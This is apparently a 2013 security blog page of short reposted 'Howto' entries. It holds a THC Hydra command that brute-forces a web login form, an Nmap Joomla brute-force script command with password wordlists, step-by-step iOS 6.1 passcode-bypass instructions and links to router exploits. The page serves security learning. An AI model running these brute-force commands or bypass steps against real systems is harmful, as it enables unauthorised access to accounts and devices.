Feb 15, 2013

Howto: Use Hydra Brute Force Login

./hydra host_address http-post-form "/login.php?var_user=^USER^&var_pass=^PASS^:S=Login
            successful" -L "user_dict" -P "pass_dict" 
 
Source: http://www.securityartwork.es/2013/02/12/thc-hydra-obtaining-user-credentials-by-brute-force 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Nmap –script http-joomla-brute

If you want the detail of this module, please visit the Source.

nmap -p80 --script http-joomla-brute --script-args 'userdb=user.txt,passdb=~/john-1.7.9/run/ password.lst,http-joomla-brute.hostname=,http-joomla-brute.threads=3, brute.firstonly=true' <server> 

Source: http://www.securityartwork.es/2013/02/14/nmap-script-http-joomla-brute-where-thc-hydra-doesnt-fit/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: iOS 6.1 Bug Enables Bypassing Passcode Lock to Access Phone and Contacts

1. Lock device
2. Slide to unlock
3. Tap emergency call
4. Hold sleep button until the power down prompt shows. Click cancel, you will notice the status bar turn blue. Type in 911 or your emergency number and click call then cancel it asap so the call dosen’t go through.
5. Lock your device with the sleep button then turn it on using the home button.
6. Slide to unlock then hold the sleep button and in 3 seconds tap emergency call. This will spazz out the phone and cause it to open



Source: http://www.macrumors.com/2013/02/14/ios-6-1-bug-enables-bypassing-passcode-lock-to-access-phone-and-contacts/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 11, 2013

Interesting Exploit Of Multiple Router

Linksys E1500/E2500
http://1337day.com/exploit/20337

WAG200G
http://1337day.com/exploit/20338

D-Link DIR-615
http://1337day.com/exploit/20339

Linksys WRT160N
http://1337day.com/exploit/20340

TP-LINK Admin Panel
http://1337day.com/exploit/20342     


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

List Of Vulnerability Web Application


If you want the detail how to learn about web application security, please go to the Source.

 

Internet-accessible


Download and Configure

Additional Resources

Source: http://danielmiessler.com/projects/webappsec_testing_resources/#methodologies%23


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |